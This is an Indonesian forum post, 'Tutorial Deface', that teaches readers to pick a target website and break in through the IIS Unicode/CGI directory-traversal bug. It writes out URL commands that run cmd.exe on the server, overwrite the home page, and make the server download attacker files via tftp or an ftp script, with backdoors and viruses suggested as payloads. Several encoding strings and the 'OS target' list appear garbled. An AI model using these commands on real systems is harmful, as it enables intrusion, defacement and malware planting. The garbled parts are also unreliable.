Forum Sava Cell™


 
IndeksFAQPencarianPendaftaranLogin

Share | 
 

 Tutorial Deface

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
avatar
admin
Administrator
Administrator

Jumlah posting : 131
Reputasi 9
Join date : 14.01.11
Lokasi : indonesia

PostSubyek: Tutorial Deface   Thu Jan 20, 2011 1:38 am
1. Kita Harus menentukan WebSite Target/ Sasaran Kita : [You must be registered and logged in to see this link.] contoh-->> [You must be registered and logged in to see this link.]

2. Login
Ini Merupakan Directory yang Ada Di Web Site Tersebut
Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
ada beberapa contoh login diantaranya :
a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc

3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..

4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1

5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo

a.)Secara umum : [You must be registered and logged in to see this link.] atau [You must be registered and logged in to see this link.]

[You must be registered and logged in to see this link.]

Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
command dir yang kita lakukan di Dos Prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm

b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set

[You must be registered and logged in to see this link.] menjadi [You must be registered and logged in to see this link.] /c+dir+c: di ubah menjadi /c+set

maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam - Macam, Yang Perlu dilihat cuma:
Path_Translated=d:\inetpub\wwwroot

c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti

/c+dir+c: menjadi /c+copy+c:

lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe

sehingga kita dapatkan :
[You must be registered and logged in to see this link.]

sekarang kamu bisa liat file cmd1.exe udah ada di direktori :

[You must be registered and logged in to see this link.]
Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita

d.) Cari halaman index ke [You must be registered and logged in to see this link.]
Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :

[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]

sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya

e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :

[You must be registered and logged in to see this link.] ndex.htm.bak

f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :

[You must be registered and logged in to see this link.]
untuk tidak merusak web nya kita tulis dengan nama file baru
[You must be registered and logged in to see this link.]

/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada

c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis

Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #
Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga

g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :

[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
Atau liat Langsung aja [You must be registered and logged in to see this link.] atau [You must be registered and logged in to see this link.]

Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:

B.) Deface WebSite Dengan Cara tftp

Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya [You must be registered and logged in to see this link.] ketik keyword nya TFTP32
Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :

a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
sehingga kita mendapatkan holenya atau script nya [You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/
langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
Setelah semua siap baru upload dengan command [You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html

b.)Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi

Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.

C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita

Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya

selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:

a.) Setelah kita menemukan vulnernya
[You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm

b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memendekkan command unicode nya

c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
[You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+set

Kira Nya path nya di c:inetpubwwwroot

d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- [You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- [You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- [You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- [You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- [You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- [You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- [You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp

Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
[You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp

Setelah selesai script tuh kita jalan kan lagi script nya:
[You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp

buka ie satulagi untuk liat file nya dah smapai belum
[You must be registered and logged in to see this link.] /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah


Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp

[You must be registered and logged in to see this link.]
tinju
Kembali Ke Atas Go down
http://forumsavacell.indonesianforum.net
 

Tutorial Deface

Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Forum Sava Cell™ :: General Computing :: Hacking-
Navigasi: